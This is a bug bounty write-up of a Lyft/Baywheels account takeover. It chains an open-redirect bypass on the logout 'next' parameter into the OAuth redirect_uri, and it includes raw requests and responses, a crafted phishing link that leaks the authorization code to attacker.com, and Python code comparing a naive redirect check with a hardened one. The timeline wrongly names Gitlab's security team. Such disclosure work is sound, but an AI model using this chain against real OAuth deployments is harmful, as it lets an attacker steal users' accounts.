Lyft : Account takeover of baywheels accounts : Stealing Oauth Token with Open redirect

Company Information:

Lyft, Inc. is an American company offering mobility as a service, ride-hailing, vehicles for hire, motorized scooters, a bicycle-sharing system, rental cars, and food delivery in the United States and select cities in Canada.

Bug Category:

OAuth 2.0 Vulnerability - Malicious Redirect URL

While browsing the web, you've almost certainly come across sites that let you log in using your social media account. The chances are that this feature is built using the popular OAuth 2.0 framework. OAuth 2.0 is highly interesting for attackers because it is both extremely common and inherently prone to implementation mistakes. This can result in a number of vulnerabilities, allowing attackers to obtain sensitive user data and potentially bypass authentication completely.


Target Information:

https://www.lyft.com/


Technical Details of the Bug:

The OAuth flow for connecting a Baywheels account through Lyft has an OAuth misconfiguration. The redirect_uri is restricted to Lyft products only, e.g. www.lyft.com, api.lyft.com, account.baywheels.com, etc. At this point the configuration looks fairly secure: the only possible attack is to find an open redirect on one of these whitelisted domains and use it to redirect the OAuth token to an attacker website. After working through many redirect endpoints, I found an open redirect bypass on the Lyft logout URL.
Open redirect bypass:

Original URL:
https://www.lyft.com/logout?next=https://www.lyft.com

Bypass URL:
https://www.lyft.com/logout?next=//attacker.com\@www.lyft.com


In the actual attack this is used with a # appended at the end, so the OAuth token ends up in the URL fragment (hash), which the attacker can then take from their logs. Once you have a working open redirect, the OAuth token can be stolen through the redirect with the help of the hash.

OAuth Workflow:

First log in with your Lyft account, then open account.baywheels.com.

1. Open account.baywheels.com
Request:
GET / HTTP/1.1
Host: account.baywheels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [cookies]

Response:
HTTP/1.1 302 Found
x-frame-options: DENY
location: https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&response_type=code&v=baywheels
vary: Accept, Accept-Encoding
content-type: text/html; charset=utf-8
date: Sun, 16 Feb 2020 07:36:42 GMT
x-envoy-upstream-service-time: 1
server: envoy-iad
connection: close
Content-Length: 346

<p>Found. Redirecting to <a href="https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&amp;redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&amp;response_type=code&amp;v=baywheels">https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&amp;redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&amp;response_type=code&amp;v=baywheels</a></p>

2. Authorize request to Lyft
Request:
GET /authorize?client_id=rT6YPX1wEscm&redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&response_type=code&v=baywheels HTTP/1.1
Host: account.lyft.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [cookies]

Note: this is the main vulnerable request. Here you change the redirect_uri parameter to the open redirect URL below.

URL:
https%3A%2F%2Fwww.lyft.com%2Flogout%3Fnext%3D%2F%2Fattacker.com%5C%40www.lyft.com%23

Response:
HTTP/1.1 302 Found
x-frame-options: DENY
location: https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D
vary: Accept, Accept-Encoding
content-type: text/html; charset=utf-8
date: Sun, 16 Feb 2020 07:44:10 GMT
x-envoy-upstream-service-time: 44
server: envoy-iad
connection: close
Content-Length: 484

<p>Found. Redirecting to <a href="https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&amp;code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D">https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&amp;code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D</a></p>

Working proof of concept and steps:

Create two accounts: victim and attacker.

1. Log in to the https://www.lyft.com account as the victim user.

2. The attacker now sends the link below to the victim.
https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&redirect_uri=https%3A%2F%2Fwww.lyft.com%2Flogout%3Fnext%3D%2F%2Fattacker.com%5C%40www.lyft.com%23&response_type=code&v=baywheels

3. The final URL after the redirect will look like this.
https://attacker.com/@www.lyft.com#&code=AQGAAAAAAF5I9B--HbWUSXizWUn7khiIM6ACcd6sZ2AiQhOa6XhEsZS9h40WgxBk3wdVcBukrOpQ5uqG0ZYJ781r7_RYgVrX_icG-ETZ_dMPveo-pvjGlWXITNI3x1T8ntEjmYJdokwyW7g%3D

As you can see, the code has arrived at the attacker.com domain in the URL fragment (hash). The attacker now opens their logs and captures the token.

4. To log in to the victim's account, the attacker sends the request below to account.baywheels.com.
https://account.baywheels.com/profile?code=[Code_captured]

5. The attacker is now inside the victim's account: a full account takeover.
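The two server-side checks that decide this bug are the logout 'next' validation and the authorization server's redirect_uri validation. The following is an added example (not Lyft's code) contrasting a naive host check, which the writeup's backslash payload fools because a server-side URL parser treats everything before '@' as userinfo while a browser treats '\' as '/', with a hardened version, plus an exact-match redirect_uri check; the allowlist and client registry are constructed from values in the writeup.

```python
from urllib.parse import urlsplit, unquote

# Hosts the writeup names as the redirect targets the OAuth flow accepted (constructed allowlist).
ALLOWED_HOSTS = {"www.lyft.com", "api.lyft.com", "account.baywheels.com"}
# Hypothetical client registry: each client_id maps to exactly one registered redirect_uri.
REGISTERED_REDIRECTS = {"rT6YPX1wEscm": "http://account.baywheels.com/"}


def weak_next_is_allowed(next_url: str) -> bool:
    """The kind of check the bypass defeats: trust the host a server-side parser reports.
    urlsplit treats everything before the last '@' as userinfo, so it reports www.lyft.com."""
    host = urlsplit(next_url, scheme="https").hostname or ""
    return host in ALLOWED_HOSTS


def safe_next(next_url: str, default: str = "/") -> str:
    """Hardened 'next' validation: return next_url only if a browser would land on an allowed host."""
    # Browsers (WHATWG URL parsing) treat '\' as '/' in http(s) URLs; normalise the same way first.
    url = next_url.replace("\\", "/")
    parts = urlsplit(url)
    if parts.scheme not in ("", "https"):
        return default
    if not parts.netloc:
        # A bare path is fine, but '//host' would be protocol-relative, so require a single leading '/'.
        return url if url.startswith("/") and not url.startswith("//") else default
    try:
        if "@" in parts.netloc or parts.port is not None:
            return default  # userinfo or an explicit port has no legitimate use here
    except ValueError:  # malformed port
        return default
    return url if (parts.hostname or "") in ALLOWED_HOSTS else default


def redirect_uri_is_registered(client_id: str, redirect_uri: str) -> bool:
    """OAuth 2.0 guidance: compare redirect_uri with the registered value exactly (no prefix/domain rules)."""
    return REGISTERED_REDIRECTS.get(client_id) == redirect_uri


if __name__ == "__main__":
    bypass = "//attacker.com\\@www.lyft.com"  # the logout 'next' payload from the writeup
    print(weak_next_is_allowed(bypass))       # True: the naive host check is fooled
    print(safe_next(bypass))                  # "/": the hardened check falls back to the default
    evil = unquote("https%3A%2F%2Fwww.lyft.com%2Flogout%3Fnext%3D%2F%2Fattacker.com%5C%40www.lyft.com%23")
    print(redirect_uri_is_registered("rT6YPX1wEscm", evil))  # False: not the registered redirect_uri
```

With exact-match redirect_uri validation the open redirect on the logout endpoint would still be worth fixing, but it could no longer be chained into the OAuth flow.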


Impact:

Account takeover of Baywheels accounts: stealing the OAuth token with an open redirect.

Timeline:
Feb 16th 2020: Report sent to the Gitlab product Security Team through HackerOne.
Feb 17th 2020: Report accepted and triaged.
Feb 19th 2020: Issue fully resolved and confirmed.
Feb 21st 2020: $3000 bounty rewarded.

